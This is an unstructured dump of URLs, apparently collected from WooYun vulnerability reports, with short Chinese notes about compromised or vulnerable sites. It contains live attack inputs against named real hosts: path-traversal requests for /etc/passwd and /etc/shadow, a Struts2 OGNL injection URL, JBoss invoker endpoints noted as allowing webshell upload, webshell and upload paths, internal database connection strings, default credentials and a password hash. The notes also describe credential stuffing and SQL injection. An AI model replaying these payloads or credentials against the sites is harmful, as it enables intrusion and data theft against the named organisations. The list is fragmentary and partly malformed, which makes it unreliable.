http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**/list.aspx?id=363110810873 http://www.goldmail.cn/learning/news_detail.php?ID=76 http://**.**.**.**:8080/invoker/JMXInvokerServlet http://2010partner.digitalchina.com/1.rar http://wooyun.org/bugs/wooyun-2010-024841成功getshell http://2010partner.digitalchina.com/system_dntb/upload/zphzph.aspx http://**.**.**.**/zh-cn/read.jsp?id=1, http://www.goldmail.cn/service/list.php?NewsType=syjq www.dufe.edu.cn/24 http://mail.ymt360.com/ http://www.vcanbio.com//Investor_AnnalsDetail.aspx?id=18 http://www.yinongdai.com/comehere/inviteFriends http://v.xiaoma.com/dt/columns/anran*/list_1516_1.html http://**.**.**.**/website/webnewsshow.aspx?tid=2321 http://**.**.**.**/website/ http://www.chinazyjr.com/Index/show/id/208*/c_id/ http://www.wy-fund.com/index.php?m=instarea&c=inbrok&a=init&inst_id=55 www.wy-fund.com/index.php?m=instarea&c=infund&inst_code=80000220 http://micro.wy-fund.com http://finance.letv.com/ http://micro.wy-fund.com/?leshi/home.info/270025抓包有两处注入的地方,分别为下面的注入1和注入3了!~~~ http://micro.wy-fund.com/?leshi/home.info/270025 http://leshi.wy-fund.com/ http://www.easy-u.com.cn http://www.easy-u.com.cn/uploadfile/php20150708.php.php.php.php.php.php.php.php.php.php.php.rar host:172.28.202.243 http://**.**.**.**/Login/loginpageforstudentb.aspx http://**.**.**.**/Login/loginpageforuserb.as http://**.**.**.**/bugs/wooyun-2014-059180 http://ele.98ep.com/ http://ele.98ep.com/Manager/Module/SystemBasis/OpinionManage/Upload/Temp/文件名 http://ele.98ep.com/Manager/Module/SystemBasis/OpinionManage/Upload/Temp/%E9%AB%98%E7%AB%AF%E9%A4%90%E9%A5%AE%E9%83%A8%E9%99%A4%E5%8C%97%E4%B8%8A1442166916.txt http://www.jyeoo.com/account/sendpassword http://tool.chacuo.net/mailanonymous http://tp.nanshan.com.cn:8011/Images.aspx?id=3 http://order.th010.com/.svn/entries http://**.**.**.**/Newspaper/Show.aspx?id=175207 http://**.**.**.**:80/information/infor.htm?firstTF=1&Kinds=17&searchName=人物&ResourceId=1 1.jf.ztgame.com/huodong.php http://jf.ztgame.com/admin/login.html http://www.crfchina.com http://www.crfchina.com/retrievePasswordResetSuccess.do www.crfchina.com http://admin.ixingmei.com/ http://**.**.**.**/rentlist.asp?isgood=2 http://**.**.**.**/jianzhi_View.asp?jianzhiid=1098 http://crm.xiaoma.com/ http://app.xiaoma.com/ http://**.**.**.**/article.php?CID=5&ID=95 http://**.**.**.**/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://office.galaxyasset.com/tools/SWFUpload/upload.jsp www.jpush.cn http://ices.hit.edu.cn:8080/mailList!toMain.action http://5sing.kugou.com/zc/login这个登陆接口是酷狗旗下5sing的登陆接口,登陆位置没有做出任何限制 http://**.**.**/console/_ http://**.**.**/mobilePolicy/login.jsp http://61.158.140.6/colorring/manager/enter.jsp http://www.ordosbank.com/message.jsf?msgId=325 http://club.bydauto.com.cn/portal.php http://webcasqa2.byd.com.cn/sso/member.php?mod=lostpasswd http://jf.ztgame.com/seckill.php http://jf.ztgame.com/oauth/notify_url.php http://jf.ztgame.com/mypoint.php http://jf.ztgame.com/mycar.php http://jf.ztgame.com/lottery.php http://jf.ztgame.com/huodong.php http://jf.ztgame.com/heartbeat.php http://jf.ztgame.com/do_receive_jifen.php http://jf.ztgame.com/admin/login.php http://jf.ztgame.com/detail.php http://jf.ztgame.com/do_buy.php http://yimin.edai.com/immigrate.php http://yimin.edai.com/manager/cx/immigrate.php?act=list&table=immigrate http://yimin.edai.com/manager/cx/index.php http://219.140.166.16/marriage/test1.jsp进去一看,各种爆破也不行 http://219.140.166.16/marriage/xunyi.jsp http://219.140.166.16/marriage/test1.jsp jdbc:oracle:thin:@10.68.0.62:1521:marreg http://servexpress.digitalchina.com/sms/DellMobile/login.asp http://**.**.**.**/public/6line/6line_gbook/河北电视台留言本处可以xss http://s1.hlzj.kugou.com/Account/Login http://mis.iciba.com/index.php?action=login http://www.qhdhr.com.cn:8081/ http://www.qhdhr.com.cn:8081/hr_cardshow/ http://ifs.swufe.edu.cn/index.php?go=product-102.html http://oa.pbwear.com:8080/page/maint/login/Page.jsp?templateId=12&logintype=2 http://gossip.renren.com/gossip.do http://www.izuche.com/EmployDetail.aspx?key=3 http://www.hxci.com.cn/library/漏洞目录 http://www.hxci.com.cn/library/data/mysqli_error_trace.inc http://**.**.**.**/bugs/wooyun-2010-0115868 http://**.**.**.**/ http://**.**.**.**:8080 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**/ http://mail.cp6cc.com.cn http://mis.iciba.com/index.php http://220.248.229.53:7001/cas/login http://**.**.**.**/v_show/id_XMTMzMTc0ODA5Ng==.html http://www.renren.com/privacyhome.do http://www.renren.com/profile/privacy/saveOther http://app.ichina.cn http://app.ichina.cn/index.php?app=findpwd&act=resetpwd&uid=bb72f7e31a0542f5adc4a537318e72c6120852 http://app.ichina.cn/index.php?app=findpwd&act=resetpwd&uid=559bc4f91463c9b1616f3b6a7470ac2d1 http://api.healthmall.tv/app/Userservices/help http://api.healthmall.tv/Handlers/ http://119.29.94.72:9909/SyatemManagement/NewLogin.aspx http://58.48.178.98:9090/seeyon/main.do?method=index http://office.galaxyasset.com/page/maint/login/Page.jsp?templateId=18 http://wpi.renren.com/muc_chat http://cs.xyzq.com.cn:9999/index.xhtml http://photo.renren.com/photo/zuji/859601814/addZuji http://lab.njnu.edu.cn/huaxue/default.asp http://lab.njnu.edu.cn/checkuser.asp http://sqlmap.org http://**.**.**.**/static/homepage/subjectpage/57400000163611.html http://www.doctorcom.com/robots.txt http://**.**.**.**/exam/?action=DataList&ClassID=2483 http://daimayi.com/index.php/Counselor/index/cr_id/10 http://**.**.**.**/negp/pages/Login/index.do http://**.**.**.**/admin_edit.asp?ID=37115&un=ztdj&pw=habc1010&XX=%D4%DA%CF%DF%CD%B6%B8%E5&whichpage=1&xq=%C7%C9%BC%D2 open.haodai.com/credit/index/xd_type/credit.html?bank_id=3&bank_id_show=%e4%ba%a4%e9%80%9a%e9%93%b6%e8%a1%8c&tag_ids=111&tag_ids_show=%e5%95%86%e6%97%85%e8%81%94%e5%90%8d http://80h.liwai.com/content.php?id=4049 http://art.liwai.com http://decorate.liwai.com http://gardens.liwai.com http://oa.superjia.com/messager/users.data http://www.ichunt.com/brand_detail.php?id=101 CanF:sqlmap http://www.ichunt.com/brand_detail.php?id=101 http://sqlmap.sourceforge.net www.ichunt.com/session https://124.192.206.253/Account?forward=https%3A%2F%2F124.192.206.253%2F http://**.**.**.**/Member/Customer_List.aspx http://**.**.**.**/manage/index.asp http://**.**.**.**/manage/index.asp http://**.**.**.**/manage/index.asp http://**.**.**.**/manage/index.asp http://www.**.**.**.**/manage/index.asp http://**.**.**.**/manage/index.asp http://**.**.**.**/manage/index.asp http://**.**.**.**/manage/index.asp https://plmyun.joyoung.com/ease/App/index.php/Public/login http://58.251.152.247:8010 http://**.**.**.**/wechat/unicomRed/common/loginOut http://**.**.**.**/ajax/mail.asp?mail= http://mail.cdzq.com/ http://**.**.**.**:8052/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= https://42.121.52.97/pay/news.php?id=646 https://42.121.52.97/pay/news.php?id=646 https://42.121.52.97/pay/news.php?id=-1 https://42.121.52.97/pay/news.php?id=-1 http://112.90.224.187/backup/configs.7z https://github.com/CodeBeginner/config_files/blob/a0c923ed07227fe71b0895772bb1af80a3692df5/滴滴个人信息.txt http://nx.gtja.com/web.rar http://zzjnet.blog.51cto.com/323001/318778 https://42.121.52.97/sec.php https://42.121.52.97/ttt.php http://60.10.8.227:88 http://60.10.8.227:88/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/info_pagelist.jsp?&page=&xwid=54355&lmmc=dd_jtyw http://**.**.**.**/wzht/loginAction.do http://**.**.**.**/wzht/y.jsp,发现是内网ip,没有加入任何域,可以上外网。 http://**.**.**.**/wzht/ http://**.**.**.** http://**.**.**.**/wzht/UpLoad/Pic/tunnel.jsp http://**.**.**.**30/license!getExpireDateOfDays.action http://**.**.**.**/login.jsp http://**.**.**.**/ http://www.fengniao.com/active/20100712_hutong/iframe_list.php?cid=3 http://www.huaweimossel.com/ http://www.huaweimossel.com/gallery-ajax_get_goods.html http://**.**.**.**/这个界面抓包 http://www.htsc.com.cn http://61.132.51.129:8001/manage/admin/index.jsp http://**.**.**.**/chaxun_geren.asp http://daimayi.com/index.php/Ask/index/type/2 http://online.omegatravel.net/flight_dynamic.aspx?FlyToIata=BKK http://124.232.143.110/ http://124.232.143.110/login_login.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://**.**.**.**:8000/hbgyjj/NewsDetail.aspx?title=%D7%A8%CC%E2%D0%C5%CF%A2&ID=2014-05-07%2009:03:48 http://**.**.**.**:8000/hbgyjj/SearchNews.aspx?keyword=123 http://**.**.**.**:8000//hbgyjj/fckeditor/editor/ http://**.**.**.**:8000/hbgyjj/image/ http://**.**.**.**:8000/hbgyjj/style/css2.css http://www.freescaleic.org/ http://analog.eefocus.com/ http://ams.eefocus.com/ http://rf.eefocus.com/ http://linear.eefocus.com/ http://mcu.eefocus.com/ http://www.stmcu.org/ http://tm.eefocus.com/ http://**.**.**.**:20022/i-card/ jdbc:oracle:thin:@**.**.**.**:1521/AMACHN jdbc:oracle:thin:@**.**.**.**:1521:ORCL jdbc:sqlserver://**.**.**.**:1433 http://**.**.**.**/download?fileName=..%2f..%2f..%2f..%2fetc%2fpasswd http://www.e-picc.com.cn/ecargo/ http://**.**.**.**/uploadimages/lpt6.201559181941.asa http://**.**.**.**/web-console/ http://**.**.**.**/invoker/JMXInvokerServlet http://jiangmen.jjshome.com/login.php3?reason=chpass2 http://k.ganji.com/password?returnUrl=%2Fuc http://219.141.171.219/login.jsp http://**.**.**.**/gps/doif/myLogin.jsp http://103.2xx.xxx.xx6:1xxx0/ http://jl.sanhao.com/,逻辑问题不少 http://**.**.**.**/youyuan/winlist.jsp?awardid=370 http://**.**.**.**/kai1_detail.asp?id=202 http://**.**.**.**/p_topic.asp?id=5 http://**.**.**.**/kxpjindex.php?id=18 http://item.ccidnet.com/index.php http://mtrack.hexun.com/track/hcstock.php?task=registeruser&userid=25863150&username=mail98318187&deviceuid=355136055562691&devicetoken=03551360555626910000001034000001&status=active&pushbadge=enabled http://www.hanzify.org/?Go=Show::List&ID=9417 http://xsc.jhun.edu.cn/bys/login.asp www.ticket2010.com http://www.goldmail.cn/document/online/news_detail.php?ID=118 http://bbs.88.com.cn/uc_server/.svn/entries http://**.**.**.**/admin http://**.**.**.**/newsshow.asp?id=528&classid=tp http://bi.cisg.cn/biportal/index.jsp http://wpm.haier.net/ http://wpm.haier.net/ci/ jdbc:oracle:thin:@**.**.**.**:1521:sgwy http://**.**.**.**/bugs/wooyun-2015-0124167 http://**.**.**/SystemManage/User/usernameys.aspx_ http://**.**.**/SystemManage/User/usernameys.aspx_ http://**.**.**/SystemManage/User/usernameys.aspx_ http://**.**.**/HumanResources/WorkTime/MyAttendance.aspxtype=1_ http://**.**.**/HumanResources/WorkTime/MyAttendance.aspxtype=1_ http://**.**.**/HumanResources/WorkTime/MyAttendance.aspxtype=1_ http://**.**.**/HumanResources/WorkTime/MyAttendance.aspxtype=1_ http://**.**.**/CRMtable/UserInfo_pm.aspxtmp=_ http://**.**.**/CRMtable/UserInfo_pm.aspxtmp=_ http://**.**.**/CRMtable/UserInfo_pm.aspxtmp=_ http://**.**.**/CRMtable/UserInfo_pm.aspxtmp=_ http://**.**.**/CRMtable/UserInfo_pm.aspxtmp=_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanSp.aspx_ http://**.**.**//MyWork/Metting/MynetMetting.aspxp=22 http://**.**.**/MyWork/Metting/MynetMetting.aspxp=22 http://**.**.**/MyWork/Metting/MynetMetting.aspxp=22 http://**.**.**/MyWork/Metting/MynetMetting.aspxp=22_ http://**.**.**//MyWork/Metting/MynetMetting.aspxp=22 http://**.**.**/CRMtable/Shengchang/Wangong/Wangong.aspxp=80_ http://**.**.**/CRMtable/Shengchang/Wangong/Wangong.aspxp=80_ http://**.**.**/CRMtable/Shengchang/Wangong/Wangong.aspxp=80_ http://**.**.**/CRMtable/Shengchang/Wangong/Wangong.aspxp=80_ http://**.**.**/CRMtable/Shengchang/Wangong/Wangong.aspxp=80_ http://**.**.**//WorkFlow/WorkFlowList_ywt.aspx_ http://**.**.**//WorkFlow/WorkFlowList_ywt.aspx_ http://**.**.**//WorkFlow/WorkFlowList_ywt.aspx_ http://**.**.**//WorkFlow/WorkFlowList_ywt.aspx http://**.**.**.**/gzsg/),phpcms http://zhaopin.digitalchina.com/Outer/default.aspx http://pk.tom.com/web/flashplay.do?action=pkgame&from=danji&gameid=1&type=2&uid=1&userid= http://**.**.**.**/announcement.php?id=118 http://**.**.**.**/youyuan/winlist.jsp?awardid=370 http://www.sino-life.com/SL_MAS/mas/SinolifeApp.apk?pub=1&publicAccountId=000&platform=01 chrome://downloads/#upload的上传功能引用了 http://115.com/static/browser/download/js/upload.js chrome://downloads/#upload http://la.lenovo.com.cn/ http://act.2144.cn/week/?id=6 http://tangyuan.tom.com/redeem/ http://tangyuan.tom.com/redeem/tom_ecardExchang http://sqlmap.org https://**.**.**.**/search?utf8=✓&q=rongbei http://www.job168.com/schools/school.jsp?school_no=27720302 http://data.liba.com/phpmyadmin/ http://data.liba.com/pma/ http://passport2.chaoxing.com/login2 http://passport2.chaoxing.com/pwd/pwdreset?uid=xxxxxxxx&refer=http://cqcet.fy.chaoxing.com&code=1cb790xxx7214f39b08c03036321axxx http://**.**.**.**/lzygg/Zixun_show.aspx?id=1 http://auth.10jqka.com.cn/server-status http://admin.1jiajie.com/v2/index.php http://admin.1jiajie.com/v2/index.php?action=login http://wooyun.org/bugs/wooyun-2015-0141209/trace/3789f61a7765dbc4f4a4c7d1b04e6095。 Service.asmx/paybilllogin https://**.**.**.**/hcsoft/lijiang-xinnonghe/blob/faf58fc9425d79ae384b25ddc8a818893a855c70/document/dizhi.txt https://**.**.**.**/hcsoft/lijiang-xinnonghe/tree/master/document http://**.**.**.**/ExPodDnloadCk.asp?ACT=11C http://**.**.**.**/sfs3/modules/fixed/fixedview.php?id=1656 http://**.**.**.**/sfs3/modules/fixed/fixedview.php?id=51 http://**.**.**.**/sfs3/modules/fixed/fixedview.php?id=849 http://**.**.**.**/sfs3/modules/book/booksay.php?sel=1 http://**.**.**.**/sfs3/modules/book/booksay.php?sel=1 http://**.**.**.**/sfs3/modules/book/booksay.php?sel=1 http://**.**.**.**/sfs3/modules/docup/doc_download.php?docup_id=188 http://**.**.**.**/sfs3/modules/magazine/magazine.php?book_num=5&chap=9 http://**.**.**.**/sfs3/modules/magazine/magazine.php?book_num=9&chap=16 http://**.**.**.**/sfs3/modules/magazine/magazine.php?book_num=6&chap=94 http://**.**.**.**/sfs3/modules/news/profile.php?msg_id=8153 http://**.**.**.**/sfs3/modules/news/profile.php?msg_id=12 http://wep.letao.com/wap/app_download.aspx?bid=12*&op=brand http://m.job168.com/schools/show.jsp?photo_no=1&school_no=5165102 http://**.**.**.**/ http://**.**.**.**/imap/index/detail_template?id=1673 http://**.**.**.**/bugs/wooyun-2015-0103197、http://**.**.**.**/bugs/wooyun-2015-0122495上述白帽子提交的是旅游门户建站系统,专门用于建站、提供各种功能等。而本次提交的是专门的订票系统类似一款插件形式,单一的站点。并且案例均不一样! http://**.**.**.**/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz http://**.**.**.**/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 inurl:prod_detail.php?item_id= inurl:prod_detail.php?item_id= http://**.**.**.**/site_item_content_3.php?site_map_item_id=210 http://**.**.**.**/nursery/site_item_content_3.php?site_map_item_id=368 http://**.**.**.**/site_item_content_3.php?site_map_item_id=26 http://**.**.**.**/huide_hosp/big5/site_item_content_3.php?site_map_item_id=68 http://**.**.**.**/site_item_content_3.php?site_map_item_id=12 http://**.**.**.**/tw/site_item_content_3.php?site_map_item_id=21 http://**.**.**.**/site_item_content_3.php?site_map_item_id=11 http://**.**.**.**/site_item_content_3.php?site_map_item_id=355 http://**.**.**.**/site_item_content_3.php?site_map_item_id=138 http://**.**.**.**/e_paper/epaper.php?main_id=28 http://**.**.**.**/e_paper/epaper.php?main_id=5 http://**.**.**.**/e_paper/epaper.php?main_id=32 http://**.**.**.**/e_paper/epaper.php?main_id=1 http://**.**.**.**/e_paper/epaper.php?main_id=9 http://**.**.**.**/e_paper/epaper.php?main_id=1 http://**.**.**.**/e_paper/epaper.php?main_id=38 http://**.**.**.**/e_paper/epaper.php?main_id=11 http://**.**.**.**/e_paper/epaper.php?main_id=5 http://**.**.**.**/tuningwork-shop/e_paper/epaper.php?main_id=16 http://**.**.**.**/e_paper/epaper.php?main_id=1 http://**.**.**.**/en/prod_detail.php?item_id=369 http://**.**.**.**/prod_detail.php?item_id=322 http://**.**.**.**/prod_detail.php?item_id=30 http://**.**.**.**/kuangtai/eng/prod_detail.php?item_id=31 http://**.**.**.**/e-shop/prod_detail.php?item_id=13 http://**.**.**.**/prod_detail.php?item_id=7 http://**.**.**.**/eng/prod_detail.php?item_id=106 http://**.**.**.**/ch/prod_detail.php?item_id=28 http://**.**.**.**/tw/prod_detail.php?item_id=42 http://**.**.**.**/en/prod_detail.php?item_id=9 http://**.**.**.**/tw/prod_detail.php?item_id=9 http://**.**.**.**/prod_detail.php?item_id=73 http://**.**.**.**/prod_list.php?series_id=1 http://**.**.**.**/prod_list.php?series_id=74 http://**.**.**.**/prod_list.php?series_id=16 http://**.**.**.**/prod_list.php?series_id=136 http://**.**.**.**/prod_list.php?series_id=16 http://**.**.**.**/cn/prod_list.php?series_id=6 http://**.**.**.**/tw/prod_list.php?series_id=29 http://**.**.**.**/prod_list.php?series_id=6 http://**.**.**.**/prod_list.php?series_id=17 http://**.**.**.**/ch/prod_list.php?series_id=7 http://**.**.**.**/prod_list.php?series_id=2 http://**.**.**.**/prod_list.php?series_id=7 http://**.**.**.**/goyou/prod_list.php?series_id=7 http://**.**.**.**/site_item_content_4.php?site_map_item_id=45 http://**.**.**.**/nursery/site_item_content_4.php?site_map_item_id=800 http://**.**.**.**/huide_hosp/big5/site_item_content_4.php?site_map_item_id=89 http://**.**.**.**/site_item_content_4.php?site_map_item_id=151 http://**.**.**.**/site_item_content_4.php?site_map_item_id=54 http://**.**.**.**/site_item_content_4.php?site_map_item_id=586 http://**.**.**.**/site_item_content_4.php?site_map_item_id=29 http://**.**.**.**/site_item_content_4.php?site_map_item_id=34 http://202.110.133.46:90/IDWebSoft/ http://wooyun.org/bugs/wooyun-2015-0141288,我们已经可以整理出如下用户的账号信息: http://**.**.**.**:9002/console http://**.**.**.**:9002/jmxroot/jmxroot.jsp jdbc:oracle:thin:@**.**.**.**:1521:wwora50 http://**.**.**/m=order.orderBook&member_phone=1_ http://**.**.**/m=order.orderBook&member_phone=1_ http://**.**.**/m=order.orderBook&member_phone=1_ http://**.**.**/m=order.orderBook&member_phone=1_ http://**.**.**/m=order.orderBook&member_phone=1_ http://**.**.**/line/list-0-0-0-0-0-1.html_ lhttp://**.**.**/line/list-0-0-0-0-0-1.html_ http://**.**.**/line/list-0-0-0-0-0-1.html_ http://**.**.**/line/list-0-0-0-0-0-1.html_ http://**.**.**/line/list-0-0-0-0-0-1.html_ http://**.**.**/line/list-0-0-0-0-0-1.html_ http://**.**.**/view/list-0-0-0-0-0-0-1.html_ http://**.**.**/view/list-0-0-0-0-0-0-1.html_ http://**.**.**/view/list-0-0-0-0-0-0-1.html_ http://**.**.**/view/list-0-0-0-0-0-0-1.html_ http://**.**.**/view/list-0-0-0-0-0-0-1.html_ http://**.**.**/view/list-0-0-0-0-0-0-1.html http://**.**.**.**/happy/index.asp http://**.**.**.**/happy/chkuser.asp https://**.**.**.**/fpwd/index.html?t=e&u=关键码 https://**.**.**.**/fpwd/index.html?t=e&u=aJNpbZll http://**.**.**.**/zwgkClass.aspx?id=1 sqlmap:sqlmap http://**.**.**.**/lds/sys_toLogin.do,账号admin/123456 http://**.**.**.**//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://**.**.**.**//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://crm.aili.com/login.php?goto=%2Fserver.php%3Fm%3Dindex http://**.**.**.**/smenu.php?menu=file:///etc/issue%00&rand=456581210&sid= http://**.**.**.**:7001细节:http://**.**.**.**/bugs/wooyun-2014-065752 http://**.**.**.**/ http://**.**.**.**/pages/login.aspx http://**.**.**.**/pages/Login.aspx http://**.**.**.**:8090/login.php?Lang=../../../../../../../../../../etc/passwd%00.htm&cmd=form http://w.panpom.com/index.php?cid=10&act=aboutus.aboutus http://www.vcanbio.com/academiccenterdetail.aspx?id=1 http://**.**.**.**/news_detail.asp?n_id=129 http://**.**.**.**/ http://**.**.**.**:9003/superadmin/adminLogin.action cn:8085 http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2015-0141209/trace/3789f61a7765dbc4f4a4c7d1b04e6095 http://220.181.168.22/login.jsp http://**.**.**.**/,郑州市人力资源与社会保障局邮件系统,登陆处可撞库,用常用用户名和弱口令123456可获得一个有效账号,进入后可查看全局通讯录,爬取所有用户名,再去撞,获得7个账号,登入可查看大量内部敏感信息。 http://**.**.**.**/ http://**.**.**.**/messager/users.data http://account.sogou.com/act/gettoken?userid=jjcsyd@sogou.com&password=7fd56fc81302c18e69132a813aab09bc&appid=1044&livetime=3600&authtype=1 http://www.yonglibao.com http://www.yonglibao.com:80/ D198C8E88D6B833153575AB4256B93C2:FG=1 www.yonglibao.com http://**.**.**.**:82/login.asp?searchyw=1&gjjxxcxyhlx=0 http://**.**.**.**:82/main.asp http://**.**.**.** http://**.**.**.** http://**.**.**.** http://ServerName/web-console/管理后台无限制访问 http://ServerName/invoker/JMXInvokerServlet通过接口可以上传webshell,这里只测试了获取系统版本和系统名 jdbc:oracle:thin:@**.**.**.**:1521:sdlss http://**.**.**.**/如图所示 http://**.**.**.**:8089/buyer/makeorder.asp?purchasebill_id=18215,如图所示: http://60.191.25.162:7003/login.jsp http://60.191.25.162:7003/console/ http://60.191.25.162:7003/ma/ma3.jsp jdbc:oracle:thin:@192.168.55.187:1521:orcl http://**.**.**.**/ http://**.**.**.**/NewsSys/ShowNews.aspx?nid=303 http://**.**.**.**/NewsSys/ShowNews.aspx?nid=303 http://**.**.**.**/NewsSys/ShowNews.aspx?nid=303 jdbc:oracle:thin:@**.**.**.**:1522:ora11g http://**.**.**.**/inavadmin/file/default.aspx文件管理器存在任意文件上传漏洞。 http://itweb.didichuxing.com/_layouts/15/viewlsts.aspx www.lppz.com/24 http://www.sure56.com/bindselect.asp? http://www.sure56.com http://wapi.hexun.com/Api_picList.cc?pid=132138528&pc=20&pn=1 http://**.**.**.**/和http://**.**.**.**/ http://**.**.**.**/user/login下拉栏可转到不同子站 http://**.**.**.**/user/login http://**.**.**.**/为例 http://**.**.**.**/Admin/fileManage.aspx?action=LIST&value1=~%2Fadmin%2F&value2= http://**.**.**.**/Admin/fileManage.aspx?action=LIST&value1=~%2F&value2= http://**.**.**.**/Admin/fileManage.aspx?action=NEWDIR&value1=~%2Fsoft%2Fwooyun http://**.**.**.**/Admin/fileManage.aspx?action=DELETE&value1=~%2Fsoft%2Fwooyun https://github.com/yeyingcai/soft/blob/d9cdf45598b778662e905e54e774832a4922914a/qssec_local_settings_product.py coding:utf8 http://wooyun.org/bugs/wooyun-2015-0138128 http://120.203.214.96/xsgj/index.jsp http://www.letv.com/ptv/vplay/23174476.html http://api.mob.app.letv.com/play?vid=23174476 http://g3.letv.cn/vod/v2/MTc2LzIzLzkzL2xldHYtdXRzLzE0L3Zlcl8wMF8yMi0zMjM5ODY0MjMtYXZjLTQ3NTY4OS1hYWMtMzIwMDEtNjk3MDQxNy00NDk5NDgxNTctNmQ2MTU4MzA2N2FjMGQ2Mzc3OGMwOTQ3NTBmZjBlM2QtMTQzNzk3MTg2OTMxNy5tcDQ=?b=516&mmsid=33649179&tm=1442332453&key=af2e4f83d633ef3ac96c12aa40c07e4c&platid=3&splatid=302&playid=0&tss=no&vtype=13&cvid=1576692383917&payff=1&pip=00d5b40bb977e724401eb25fe303c2f8&format=1&sign=mb&dname=mobile&expect=3&tag=mobile http://122.72.111.116/176/23/93/letv-uts/14/ver_00_22-323986423-avc-475689-aac-32001-6970417-449948157-6d61583067ac0d63778c094750ff0e3d-1437971869317.letv?crypt=63aa7f2e234&b=516&nlh=3072&nlt=45&bf=36&p2p=1&video_type=mp4&termid=0&tss=no&geo=CN-31-412-3&platid=3&splatid=302&its=0&qos=5&proxy=1972482332,2051544247,467484324&keyitem=rxWmhiz4nvsenbC4B_PU1Ho7JhJWOKmfhaz0NA..&ntm=1442350800&nkey=41a6034d60e7dd335ffa49e11f0a917e&nkey2=edab82ab0b281b7a61c84c2f0f7d6c43&enckit=1&mltag=1&mmsid=33649179&tm=1442332453&key=af2e4f83d633ef3ac96c12aa40c07e4c&playid=0&vtype=13&cvid=1576692383917&payff=1&sign=mb&dname=mobile&tag=mobile&errc=0&gn=163&buss=4701&cips=222.60.109.51 http://service.sanhao.com/login.php http://123.57.18.112/mysqladmin/index.php http://gongyi.homelink.com.cn/lianjia/portal/user/loginHtml http://sy.crland.com.cn/admin@manager/login.php http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_StuSend.aspx?cid=0801&pid=2010 http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_StuSend.aspx?cid=0801&pid=2010 http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_StuSend.aspx?cid=0801&pid=2010 http://**.**.**.**:8090/VJ/PublicModule/MessageManage/Iframe_StuSend.aspx?cid=0801&pid=2010 http://**.**.**.**/PublicModule/MessageManage/Iframe_StuSend.aspx?cid=0801&pid=2010 http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_StuSend.aspx?cid=0801&pid=2010 http://**.**.**.**/PublicModule/MessageManage/Iframe_StuSend.aspx?cid=0801&pid=2010 http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_Admin.aspx?did=01 http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_Admin.aspx?did=01 http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_Admin.aspx?did=01 http://**.**.**.**:8090/VJ/PublicModule/MessageManage/Iframe_Admin.aspx?did=01 http://**.**.**.**/PublicModule/MessageManage/Iframe_Admin.aspx?did=01 http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_Admin.aspx?did=01 http://**.**.**.**/PublicModule/MessageManage/Iframe_Admin.aspx?did=01 http://**.**.**.**/ http://**.**.**.**/query.jsp?status=0&tuid=1%27%22 http://data.1jiajie.com:80/ www.acunetix-referrer.com http://report.mail.fund123.cn/login.aspx http://report.mail.fund123.cn/main.aspx?companyid=phfund这样就可以登录任意基金公司的账号,规则是这样子滴:companyid="基金名称首字母"+fund。先看看鹏华基金的。 site:doyouhike.net http://www.tjtou.cn/page/website/infonews/list?classid=26* site:bpzykh.com inurl:info https://account.shfft.com/member/pwd/find http://www.cdyushun.com/bigclass.aspx?bigcc=29 http://www.firstworldsec.com.hk/FirstWorldSec_aspx/DailyMsg/viewDailyMsg.aspx?ID=1804&LangId= http://**.**.**.**/yiyun/security/toLogin.action http://**.**.**.**/index.php/News/cate.html?pid=124 http://kjxy.xijing.edu.cn/about.php?id=14 http://gljsx.xijing.edu.cn/newsbrow.asp?stype=%E9%99%A2%E7%B3%BB%E5%85%AC%E5%91%8A&type=%E6%96%B0%E9%97%BB%E5%85%AC%E5%91%8A&id=1529 http://oa.szahotel.com/ https://ssl.tujia.com https://ssl.tujia.com/admin/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media https://ssl.tujia.com/vpnweb/userfiles/media/cmd.php http://**.**.**.** URL:http://js.medejob.com/jobseeker/stage/FAQ_Question.aspx?class=1 www.hlitong.com http://www.hlitong.com:80/ www.hlitong.com http://**.**.**.**/comp/showPerson.aspx?U=yuzhechen http://**.**.**.**/bugs/wooyun-2010-0120323 http://**.**.**.**/ http://**.**.**.**:7001/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml http://**.**.**.**:8081/tools/SWFUpload/upload.jsp http://**.**.**.**:8081/tools/SWFUpload/upload.jsp 